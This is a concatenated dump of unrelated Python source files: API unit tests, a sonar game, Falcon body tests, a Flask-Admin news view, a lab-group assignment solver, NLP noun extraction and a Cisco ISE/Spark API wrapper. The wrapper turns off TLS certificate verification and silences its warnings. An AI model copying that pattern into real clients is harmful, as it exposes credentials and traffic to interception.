res['create_success']['results'][0]['dep_id']\n self.assertEqual(dep_id, \"T01\", \"添加学院失败\")\n\n def test_case_05(self):\n \"\"\"\n 测试学院更新接口\n \"\"\"\n # 准备url\n dep_id = \"T01\"\n url = self.url + \"{}/\".format(dep_id)\n\n # 请求数据\n dep_name = \"测试大学院好\"\n data = {\n \"data\": [\n {\n \"dep_id\": dep_id,\n \"dep_name\": dep_name,\n \"master_name\": \"段教授\",\n \"slogan\": \"学以致用\"\n }\n ]\n }\n\n # 发送请求\n res = self.send.send_main(\"put\", url=url, json=data)\n # dumpJ(res)\n\n # 通过dep_id断言\n self.assertEqual(res['dep_id'], dep_id, \"更新失败\")\n # 通过dep_name断言\n self.assertEqual(res['dep_name'], dep_name, \"更新失败\")\n\n def test_case_06(self):\n \"\"\"\n 删除接口测试\n \"\"\"\n # 参数\n data = {\n \"$dep_id_list\": \"T01\"\n }\n # 发送请求\n 
res = self.send.send_main(\"delete\", url=self.url, data=data)\n # 通过状态码 204 断言\n self.assertEqual(res, 204, \"删除失败\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_suite/test_department.py","file_name":"test_department.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"612872325","text":"# Sonar Treasure Hunt\n\nimport random\nimport sys\nimport math\n\ndef getNewBoard():\n # Create a new 60x15 board data structure.\n board = []\n for x in range(60): # The main list is a list of 60 lists.\n board.append([])\n for y in range(15): # Each list in the main list has 15 single-character strings.\n # Use different characters for the ocean to make it more readable.\n if random.randint(0, 1) == 0:\n board[x].append('~')\n else:\n board[x].append('`')\n return board\n\ndef drawBoard(board):\n # Draw the board data structure.\n tensDigitsLine = ' ' # Initial space for the numbers down the left side of the board\n for i in range(1, 6):\n tensDigitsLine += (' ' * 9) + str(i)\n\n # Print the numbers across the top of the board.\n print(tensDigitsLine)\n print(' ' + ('0123456789' * 6))\n print()\n\n # Print each of the 15 rows.\n for row in range(15):\n # Single-digit numbers need to be padded with an extra space.\n if row < 10:\n extraSpace = ' '\n else:\n extraSpace = ''\n\n # Create the string for this row on the board.\n boardRow = ''\n for column in range(60):\n boardRow += board[column][row]\n\n print('%s%s %s %s' % (extraSpace, row, boardRow, row))\n\n # Print the numbers across the bottom of the board.\n print()\n print(' ' + ('0123456789' * 6))\n print(tensDigitsLine)\n\n\n#while True:\n # Game setup\n #sonarDevices = 20\ntheBoard = getNewBoard()\n #theChests = getRandomChests(3)\ndrawBoard(theBoard)\n #previousMoves = []\n","sub_path":"sonar.py","file_name":"sonar.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"288345466","text":"import io\n\nimport falcon\nfrom falcon import request_helpers\nimport falcon.testing as testing\n\nSIZE_1_KB = 1024\n\n\nclass TestRequestBody(testing.TestBase):\n\n def before(self):\n self.resource = testing.TestResource()\n self.api.add_route('/', self.resource)\n\n def test_empty_body(self):\n self.simulate_request('/', body='')\n stream = self.resource.req.stream\n\n stream.seek(0, 2)\n self.assertEqual(stream.tell(), 0)\n\n def test_tiny_body(self):\n expected_body = '.'\n self.simulate_request('', body=expected_body)\n stream = self.resource.req.stream\n\n actual_body = stream.read(1)\n self.assertEqual(actual_body, expected_body.encode('utf-8'))\n\n stream.seek(0, 2)\n self.assertEqual(stream.tell(), 1)\n\n def test_tiny_body_overflow(self):\n expected_body = '.'\n self.simulate_request('', body=expected_body)\n stream = self.resource.req.stream\n\n # Read too many bytes; shouldn't block\n actual_body = stream.read(len(expected_body) + 1)\n self.assertEqual(actual_body, expected_body.encode('utf-8'))\n\n def test_read_body(self):\n expected_body = testing.rand_string(SIZE_1_KB / 2, SIZE_1_KB)\n expected_len = len(expected_body)\n headers = {'Content-Length': str(expected_len)}\n\n self.simulate_request('', body=expected_body, headers=headers)\n\n content_len = self.resource.req.get_header('content-length')\n self.assertEqual(content_len, str(expected_len))\n\n stream = self.resource.req.stream\n\n actual_body = stream.read()\n 
self.assertEqual(actual_body, expected_body.encode('utf-8'))\n\n stream.seek(0, 2)\n self.assertEqual(stream.tell(), expected_len)\n\n self.assertEqual(stream.tell(), expected_len)\n\n def test_bounded_stream_property_empty_body(self):\n \"\"\"Test that we can get a bounded stream outside of wsgiref.\"\"\"\n\n environ = testing.create_environ()\n req = falcon.Request(environ)\n\n bounded_stream = req.bounded_stream\n\n # NOTE(kgriffs): Verify that we aren't creating a new object\n # each time the property is called. Also ensures branch\n # coverage of the property implementation.\n assert bounded_stream is req.bounded_stream\n\n data = bounded_stream.read()\n self.assertEqual(len(data), 0)\n\n def test_body_stream_wrapper(self):\n data = testing.rand_string(SIZE_1_KB / 2, SIZE_1_KB)\n expected_body = data.encode('utf-8')\n expected_len = len(expected_body)\n\n # NOTE(kgriffs): Append newline char to each line\n # to match readlines behavior\n expected_lines = [(line + '\\n').encode('utf-8')\n for line in data.split('\\n')]\n\n # NOTE(kgriffs): Remove trailing newline to simulate\n # what readlines does\n expected_lines[-1] = expected_lines[-1][:-1]\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.read(), expected_body)\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.read(2), expected_body[0:2])\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.read(expected_len + 1), expected_body)\n\n # NOTE(kgriffs): Test that reading past the end does not\n # hang, but returns the empty string.\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n for i in range(expected_len + 1):\n expected_value = expected_body[i:i + 1] if i < expected_len else b''\n self.assertEqual(body.read(1), expected_value)\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.readline(), expected_lines[0])\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.readline(-1), expected_lines[0])\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.readline(expected_len + 1), expected_lines[0])\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.readlines(), expected_lines)\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.readlines(-1), expected_lines)\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.readlines(expected_len + 1), expected_lines)\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(next(body), expected_lines[0])\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n for i, line in enumerate(body):\n self.assertEqual(line, expected_lines[i])\n","sub_path":"tests/test_request_body.py","file_name":"test_request_body.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"524490390","text":"import arrow\nfrom jinja2 import Markup\n\nfrom .. 
import db\nfrom .base_mt_view import BaseMTView\n\n\nclass News(db.Model):\n __tablename__ = 'news'\n\n # Columns\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(200))\n abstract = db.Column(db.String(500))\n content = db.Column(db.Text)\n source = db.Column(db.String(200))\n author = db.Column(db.String(50))\n photo_abstract = db.Column(db.String(255))\n link = db.Column(db.String(255))\n tag = db.Column(db.String(20))\n posted_at = db.Column(db.TIMESTAMP)\n is_deleted = db.Column(db.Boolean)\n review_status = db.Column(db.Boolean)\n created_at = db.Column(db.TIMESTAMP)\n updated_at = db.Column(db.TIMESTAMP)\n\n\nclass NewsView(BaseMTView):\n can_create = True\n can_edit = True\n\n column_labels = dict(\n title='标题',\n abstract='简介',\n content='内容',\n source='来源',\n author='作者',\n tag='标签',\n photo_abstract='缩略图地址',\n link='文章链接',\n posted_at='发布时间',\n is_deleted='隐藏',\n review_status='审核状态',\n created_at='创建时间',\n updated_at='修改时间'\n )\n column_descriptions = dict(\n abstract='显示在列表页的文字',\n photo_abstract='显示在列表页的图片,填写url'\n )\n column_list = (\n 'photo_abstract',\n 'title',\n 'tag',\n # 'abstract',\n 'source',\n 'author',\n 'posted_at',\n # 'link',\n 'is_deleted',\n 'review_status',\n 'created_at',\n 'updated_at'\n )\n\n column_sortable_list = ('posted_at',)\n column_searchable_list = ('title',)\n column_filters = ('author',)\n column_default_sort = ('id', True)\n\n column_editable_list = ('title', 'source', 'link',\n 'author', 'posted_at', 'tag')\n\n form_choices = {\n 'tag': [\n ('news', '教程'),\n ('new_currency', '每日上新'),\n ('token_talk', '币聊')\n ]\n }\n\n def _get_tag(view, context, model, name):\n tags = view.form_choices['tag']\n for (val, display) in tags:\n if val == model.tag:\n return display\n\n return ''\n\n column_formatters = dict(\n photo_abstract=lambda v, c, m, p: BaseMTView._list_thumbnail(\n v, c, m, 'photo_abstract'),\n tag=_get_tag,\n posted_at=lambda v, c, m, p: arrow.get(m.created_at)\n .to('Asia/Shanghai')\n .format('YYYY-MM-DD HH:mm:ss'),\n created_at=lambda v, c, m, p: arrow.get(m.created_at)\n .to('Asia/Shanghai')\n .format('YYYY-MM-DD HH:mm:ss'),\n updated_at=lambda v, c, m, p: arrow.get(m.updated_at)\n .to('Asia/Shanghai')\n .format('YYYY-MM-DD HH:mm:ss'),\n )\n\n form_columns = (\n 'title',\n 'abstract',\n 'tag',\n 'content',\n 'source',\n 'author',\n 'photo_abstract',\n 'link',\n 'is_deleted',\n 'review_status',\n )\n\n def on_model_change(self, form, model, is_created):\n model.updated_at = arrow.now().timestamp\n if is_created:\n model.created_at = arrow.now().timestamp\n model.posted_at = arrow.now().timestamp\n","sub_path":"project/models/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"66266844","text":"\"\"\"\n\"\"\"\nimport tensorflow as tf\n\ndef get_items_from_tfrecords(file_path, ret):\n for example in tf.python_io.tf_record_iterator(file_path):\n tf_example = tf.train.Example.FromString(example)\n for k in ret:\n if k in ret:\n storage = ret[k]\n storage[0].append(storage[1](tf_example.features.feature[k]))\n return","sub_path":"data_analytics/video_level.py","file_name":"video_level.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"16515490","text":"import argparse\nimport itertools as it\n\nfrom tqdm import tqdm\n\nfrom utils import AssignmentsConfig\nfrom preprocessing import 
preprocess\n\n\ndef _check_is_good_combo(student_combo: list, all_students: list, config) -> bool:\n r\"\"\"Checks if a given combination is valid.\n\n Criteria to check:\n (1) All students are accounted for\n (2) No student appears more than once (already checked by (1))\n (3) All lab groups have 3 <= num_members <= 5 (true by assumption from code before)\n \"\"\"\n\n is_good = False\n\n # all students are accounted for and no student is present more than once\n if set([stud for studs in student_combo for stud in studs]) == set(all_students):\n is_good = True\n\n return is_good\n\n\ndef _write_good_combos(good_combos: list, file_name, lab_groups, write_score: bool=False, score: int=0):\n r\"\"\"Writes the given time/student configurations to a specified .txt file.\"\"\"\n\n with open(file_name, \"w\") as f:\n if write_score:\n f.write(f\"Unhappiness level: {score}\\n\")\n for i, (times, combos) in enumerate(good_combos):\n title = f\"Configuration {i+1}\"\n f.write(f\"{title}\\n\" + (\"=\"*len(title)) + \"\\n\")\n\n for j, (time, combo) in enumerate(zip(times, combos)):\n f.write(f\"{lab_groups[j].name} ({time}): \")\n\n for stud in combo:\n f.write(f\" {stud.name}\")\n f.write(\"\\n\")\n f.write(\"\\n\"*4)\n\n\ndef _score_configuration(combination, lab_groups):\n r\"\"\"Calculates the total unhappiness for a given configuration of lab groups.\n\n Calculated as the sum of the indexes into each student's preference list of\n their actual assignment.\n \"\"\"\n\n # calculate the index offset for each student\n total_unhappiness = 0\n\n for i, lg_students in enumerate(combination):\n for stud in lg_students:\n total_unhappiness += stud.preferences.index(lab_groups[i].name)\n\n return total_unhappiness\n\n\ndef find_assignments(students, lab_groups, config):\n\n # match students with lab group times for each lab group\n for lg in lab_groups:\n lg.find_members(students)\n\n good_combos = []\n cart_prod_lg_times = [list(lg.good_times.keys()) for lg in lab_groups]\n\n # I'm not sure if this product will work as coded (since input is list of lists)\n all_time_combos_pbar = tqdm(list(it.product(*cart_prod_lg_times)), desc=\"Going through time combinations\")\n for time_combo in all_time_combos_pbar:\n lg_students = [lg.good_times[time_combo[i]] for i, lg in enumerate(lab_groups)] # list of sets of students\n students_in_time_combo = [stud for studs in lg_students for stud in studs]\n\n # all students accounted for\n if set(students_in_time_combo) == set(students):\n for group_size_combo in it.combinations_with_replacement(config.group_sizes, r=len(lab_groups)):\n # checksum\n if sum(group_size_combo) == len(students):\n all_student_combos = [it.combinations(lg_studs, r=group_size_combo[i]) for i, lg_studs in enumerate(lg_students)] # list of lists of lists\n\n # check if every combination is compatible\n for particular_student_combo in it.product(*all_student_combos):\n\n if _check_is_good_combo(particular_student_combo, students, config):\n good_combos.append((time_combo, particular_student_combo))\n all_time_combos_pbar.update()\n all_time_combos_pbar.refresh()\n\n # record all found combinations and compute scores\n _write_good_combos(good_combos, config.data_dir/\"all_configurations.txt\", lab_groups)\n scores = [_score_configuration(lg_configurations, lab_groups) for (_, lg_configurations) in good_combos]\n\n # get best matching(s) and record results\n try:\n min_score = min(scores)\n best_scores_idx = [i for i, score in enumerate(scores) if score == min_score]\n best_combos = [good_combos[i] 
for i in best_scores_idx]\n _write_good_combos(best_combos, config.data_dir/\"best_configurations.txt\", lab_groups, write_score=True, score=min_score)\n except ValueError:\n print(\"No lab group configuration was found!\\n\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--s_data\", type=str, default=\"RealishStudentData.csv\",\n help=\"The CSV containing the student data.\")\n parser.add_argument(\"--lg_data\", type=str, default=\"FakeLabGroupData.csv\",\n help=\"The CSV containing the faculty/lab group data.\")\n parser.add_argument(\"--file_format\", type=str, default=\"F_2019\",\n help=\"Determines the parsing of the CSV files (see documentation for more details.\")\n parser.add_argument(\"--min_size\", type=int, default=3,\n help=\"Minimum group size.\")\n parser.add_argument(\"--max_size\", type=int, default=5,\n help=\"Maximum group size.\")\n args = parser.parse_args()\n\n cfg = AssignmentsConfig(student_data_file=args.s_data, lab_group_data_file=args.lg_data,\n file_format=args.file_format,\n min_size=args.min_size, max_size=args.max_size)\n\n student_data, lab_group_data = preprocess(cfg)\n\n find_assignments(student_data, lab_group_data, cfg)\n\n with open(cfg.data_dir/\"finished.txt\", \"w\") as finish_file:\n finish_file.write(\"Finished!\")\n","sub_path":"src/assignments.py","file_name":"assignments.py","file_ext":"py","file_size_in_byte":5499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"181523196","text":"#\n# Dan Kirkwood (dkirkwoo@cisco.com)\n# August 2017\n#\n# A collection of generic API calls to Cisco Identity Services Engine (ISE) and Spark\n# \n#\n#\n# WARNING:\n# This script is meant for educational purposes only.\n# Any use of these scripts and tools is at\n# your own risk. 
There is no guarantee that\n# they have been through thorough testing in a\n# comparable environment and we are not\n# responsible for any damage or data loss\n# incurred with their use.\n# \n\nimport requests\nimport json\nfrom lxml import etree\nimport xmltodict\n\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nclass ISEAPI(object):\n\n\tdef __init__(self, server, username, password):\n\t\tself.server = server\n\t\tself.username = username\n\t\tself.password = password\n\n\n\tdef ISEGETE(self, url, headers):\n\t\t\"\"\"\n\t\tGeneric GET request using Etree to parse XML data\n\t\t\"\"\"\n\n\t\ttry:\n\t\t\tresponse = requests.request(\"GET\", url, auth=(self.username,self.password), headers=headers, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 200):\n\t\t\t\troot = etree.fromstring(str(response.text))\n\t\t\t\treturn root\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in GET -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\n\n\tdef ISEGETJ(self, url, headers):\n\n\t\ttry:\n\t\t\tresponse = requests.request(\"GET\", url, auth=(self.username,self.password), headers=headers, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 200):\n\t\t\t\treturn json.loads(response.text)\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in GET -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\t\t\n\n\n\tdef ISEGETX(self, url, headers):\n\t\t\"\"\"\n\t\tGeneric GET request using XMLtoDict to parse data\n\t\t\"\"\"\n\n\t\ttry:\n\t\t\tresponse = requests.request(\"GET\", url, auth=(self.username,self.password), headers=headers, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 200):\n\t\t\t\troot = xmltodict.parse(response.text)\n\t\t\t\treturn root\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in GET -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\n\n\n\tdef ISEPOST(self, url, headers, content):\n\t\t\"\"\"\n\t\tGeneric POST\n\t\t\"\"\"\n\n\t\ttry:\n\t\t\tresponse = requests.request(\"POST\", url, auth=(self.username,self.password), headers=headers, data=content, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 201):\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in POST -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\n\n\n\tdef ISEDELETE(self, url, headers):\n\t\t\"\"\"\n\t\tGeneric DELETE\n\t\t\"\"\"\n\n\t\ttry:\n\t\t\tresponse = requests.request(\"DELETE\", url, auth=(self.username,self.password), headers=headers, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 204):\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in GET -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection 
-->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\n\n\n\tdef GetAllEndpoints(self):\n\t\t\"\"\"\n\t\tRetrieve all endpoints in the ISE deployment\n\t\t\"\"\"\n\t\tmyurl = \"https://\"+self.server+\":9060/ers/config/endpoint?size=100\"\n\t\theaders = {'accept': \"application/json\"}\n\t\treturn self.ISEGETJ(myurl, headers)\n\n\tdef GetNextEndpoints(self, page):\n\t\tmyurl = page\n\t\theaders = {'accept': \"application/json\"}\n\t\treturn self.ISEGETJ(myurl, headers)\n\t\t\n\n\n\tdef GetEndpointByID(self, endpointID):\n\t\t\"\"\"\n\t\tRetrieve specific Endpoint data using the unique ISE ID\n\t\t\"\"\"\n\t\tmyurl = \"https://\"+self.server+\":9060/ers/config/endpoint/\"+endpointID\n\t\theaders = {'accept' : \"application/json\"}\n\t\treturn self.ISEGETJ(myurl, headers)\n\n\n\tdef CreateEndpoint(self, content):\n\t\t\"\"\"\n\t\tCreate an endpoint in the ISE deployment\n\t\t\"\"\"\n\t\tmyurl = \"https://\"+self.server+\":9060/ers/config/endpoint\"\n\t\theaders = {'content-type': \"application/vnd.com.cisco.ise.identity.endpoint.1.0+xml; charset=utf-8\"}\n\t\t#print content\n\t\treturn self.ISEPOST(myurl, headers, content)\n\n\n\tdef DeleteEndpoint(self, endpointID):\n\t\t\"\"\"\n\t\tDelete an Endpoint from the ISE deployment\n\t\t\"\"\"\n\t\tmyurl = \"https://\"+self.server+\":9060/ers/config/endpoint/\"+endpointID\n\t\theaders = {'accept': \"application/vnd.com.cisco.ise.identity.endpoint.1.0+xml\"}\n\t\treturn self.ISEDELETE(myurl, headers)\n\n\n\tdef MacTransform(self, macAddress):\n\t\t\"\"\"\n\t\tTake input MAC address using any delimiter, and transform to the : delimiter with uppercase characters to make suitable for ISE\n\t\t\"\"\"\n\t\tletters = (\":\" if i % 3 == 0 else char for i, char in enumerate(macAddress.upper(), 1))\n\t\ttransMac = str(''.join(letters))\n\t\treturn transMac\n\n\n\nclass SparkAPI(object):\n\n\t\"\"\"\n\tRequires a known bot ID and Room ID for retrieving and creating messages\n\t\"\"\"\n\n\tdef __init__(self, botID):\n\t\tself.botID = botID\n\n\tdef SparkGET(self, url, headers):\n\t\t\"\"\"\n\t\tGeneric Spark GET\n\t\t\"\"\"\n\t\t\n\t\ttry:\n\t\t\tresponse = requests.request(\"GET\", url, headers=headers, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 200):\n\t\t\t\treturn response.text\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in GET -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\n\n\n\tdef SparkPOST(self, url, headers, payload):\n\t\t\"\"\"\n\t\tGeneric Spark POST\n\t\t\"\"\"\n\t\t\n\t\ttry:\n\t\t\tresponse = requests.request(\"POST\", url, headers=headers, data=payload, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 200):\n\t\t\t\treturn response.text\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in GET -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\n\n\tdef SparkJSONPOST(self, url, headers, payload):\n\t\ttry:\n\t\t\tresponse = requests.request(\"POST\", url, headers=headers, json=payload, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 200):\n\t\t\t\treturn response.text\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in GET -->\"+(response.text))\n\t\texcept 
requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\t\t\n\n\n\tdef GETMessage(self, messageID):\n\t\t\"\"\"\n\t\tGet a message from its unique Spark Message ID\n\t\t\"\"\"\n\t\t\n\t\turl = 'https://api.ciscospark.com/v1/messages/'+messageID\n\t\theaders = {'content-type' : 'application/json; charset=utf-8', 'authorization' : \"Bearer \"+self.botID}\n\t\treturn self.SparkGET(url, headers)\n\n\tdef GETPerson(self, userID):\n\t\t\"\"\"\n\t\tGet details of a Spark user\n\t\t\"\"\"\n\n\t\turl = 'https://api.ciscospark.com/v1/people/'+userID\n\t\theaders = {'content-type' : 'application/json; charset=utf-8', 'authorization' : \"Bearer \"+self.botID}\n\t\treturn self.SparkGET(url, headers)\n\n\tdef POSTMessage(self, payload):\n\t\t\"\"\"\n\t\tCreate a message in Spark\n\t\t\"\"\"\n\n\t\turl = 'https://api.ciscospark.com/v1/messages'\n\t\theaders = {'content-type' : 'application/json; charset=utf-8', 'authorization' : \"Bearer \"+self.botID}\n\t\treturn self.SparkPOST(url, headers, payload)\n\n\tdef POSTMarkdownMessage(self, payload):\n\n\t\turl = 'https://api.ciscospark.com/v1/messages'\n\t\theaders = {'content-type' : 'application/json; charset=utf-8', 'authorization' : \"Bearer \"+self.botID}\n\t\treturn self.SparkJSONPOST(url, headers, payload)\n","sub_path":"python/ISEAPI.py","file_name":"ISEAPI.py","file_ext":"py","file_size_in_byte":7847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"569472906","text":"import csv\nimport nltk\nfrom textblob import TextBlob\nimport spacy\n\n\n# TextBlob approach\nwith open('gsa_sorns.csv') as sorn_csv:\n with open('noun_extracting/TextBlob.csv', 'w') as output:\n reader = csv.DictReader(sorn_csv)\n writer = csv.writer(output)\n for row in reader:\n blob = TextBlob(row['PII'])\n system_name_and_noun_phrases = [row['System Name']] + blob.noun_phrases\n writer.writerow(system_name_and_noun_phrases)\n\n\n# Simple nlp noun checker\nis_noun = lambda pos: pos[:2] == 'NN'\nwith open('gsa_sorns.csv') as sorn_csv:\n with open('noun_extracting/simple_nlp_nouns.csv', 'w') as output:\n reader = csv.DictReader(sorn_csv)\n writer = csv.writer(output)\n for row in reader:\n tokenized = nltk.word_tokenize(row['PII'])\n nouns = [word for (word, pos) in nltk.pos_tag(tokenized) if is_noun(pos)] \n system_name_and_nouns = [row['System Name']] + nouns\n writer.writerow(system_name_and_nouns)\n\n\n# More complicated nlp phrase checker \ngrammar = \"NP: {*+**}\"\ncp = nltk.RegexpParser(grammar)\nwith open('gsa_sorns.csv') as sorn_csv:\n with open('noun_extracting/complicated_nlp_phrases.csv', 'w') as output:\n reader = csv.DictReader(sorn_csv)\n writer = csv.writer(output)\n for row in reader:\n sentences = nltk.sent_tokenize(row['PII'])\n sentences = [nltk.word_tokenize(sent) for sent in sentences]\n sentences = [nltk.pos_tag(sent) for sent in sentences]\n phrases = []\n for sentence in sentences:\n result = cp.parse(sentence)\n for chunk in result:\n try:\n phrase = [word for (word, tag) in chunk.leaves()]\n phrase = \" \".join(phrase)\n phrases.append(phrase)\n except:\n pass\n system_name_and_phrases = [row['System Name']] + phrases\n writer.writerow(system_name_and_phrases)\n\n\nnlp = spacy.load(\"en_core_web_sm\")\nwith open('gsa_sorns.csv') as sorn_csv:\n with open('noun_extracting/spacy_noun_phrases.csv', 'w') as output:\n reader = csv.DictReader(sorn_csv)\n writer = csv.writer(output)\n for row in reader:\n nlp_text = 
nlp(row['PII'])\n noun_phrases = [chunk.text for chunk in nlp_text.noun_chunks]\n writer.writerow(noun_phrases)\n \n","sub_path":"noun_finder.py","file_name":"noun_finder.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"343492994","text":"import json\nimport unittest\nimport dataset.loader\nimport pandas as pd\n\n\nclass TestDatasetLoaderExternalDataLoader(unittest.TestCase):\n \"\"\"Tests for the ExternalDataLoader class.\"\"\"\n\n class FakeResponse:\n \"\"\"The FakeResponse class makes a fake response by a self-specified status code and content.\"\"\"\n\n def __init__(self, status_code, content):\n self.status_code = status_code\n self.content = content.encode('utf-8') if content is not None else None\n\n class FakeRequests:\n \"\"\"The FakeRequests class fakes the requests library and has a custom get() method which always delivers the\n given FakeResponse.\"\"\"\n\n def __init__(self, fake_response):\n self.fake_response = fake_response\n self.call_count = 0\n\n def get(self, url):\n self.call_count += 1\n return self.fake_response\n\n def test_get_csv(self):\n # Fake a response (for any given URL)\n dataset.loader.requests = self.FakeRequests(self.FakeResponse(\n status_code=200,\n content='header1,header2' + \"\\n\" + 'cell1,cell2'\n ))\n\n # Setup the external dataloader\n loader = dataset.loader.ExternalDataLoader()\n loader.files['test-csv'] = {\n 'path': 'test.csv',\n 'parser': dataset.loader.ExternalDataLoader.parse_csv\n }\n\n # Try to fetch the file\n result = loader.get('test-csv', ignore_cache=True)\n\n # Check whether the content is correct\n self.assertIsInstance(result, pd.DataFrame)\n self.assertEqual(result.shape[0], 1)\n self.assertListEqual(result.columns.tolist(), ['header1', 'header2'])\n self.assertDictEqual(result.iloc[0].to_dict(), {'header1': 'cell1', 'header2': 'cell2'})\n\n def test_get_json(self):\n # Fake a response (for any given URL)\n dataset.loader.requests = self.FakeRequests(self.FakeResponse(\n status_code=200,\n content=json.dumps({'hello': {0: 'world'}})\n ))\n\n # Setup the external dataloader\n loader = dataset.loader.ExternalDataLoader()\n loader.files['test-json'] = {\n 'path': 'test.json',\n 'parser': dataset.loader.ExternalDataLoader.parse_json\n }\n\n # Try to fetch the file\n result = loader.get('test-json', ignore_cache=True)\n\n # Check whether the content is correct\n self.assertIsInstance(result, pd.DataFrame)\n self.assertEqual(result.shape[0], 1)\n self.assertListEqual(result.columns.tolist(), ['hello'])\n self.assertDictEqual(result.iloc[0].to_dict(), {'hello': 'world'})\n\n def test_404_response(self):\n # Fake a 404 (file not found) response\n dataset.loader.requests = self.FakeRequests(self.FakeResponse(\n status_code=404,\n content=\"\"\n ))\n\n # Setup the external dataloader\n loader = dataset.loader.ExternalDataLoader()\n\n # Try to fetch any file (which will encounter a 404 by the fake request)\n first_file = list(loader.files.keys())[0]\n\n # Trying to fetch the file should raise a ValueError\n with self.assertRaises(ValueError):\n loader.get(first_file, ignore_cache=True)\n\n def test_get_unknown_file(self):\n # Setup the external dataloader\n loader = dataset.loader.ExternalDataLoader()\n\n # Trying to fetch an unknown file should raise a ValueError\n unknown_file = '$unknown_file'\n with self.assertRaises(ValueError):\n loader.get(unknown_file, ignore_cache=True)\n\n def test_cache_mechanism(self):\n # Fake a response (for 
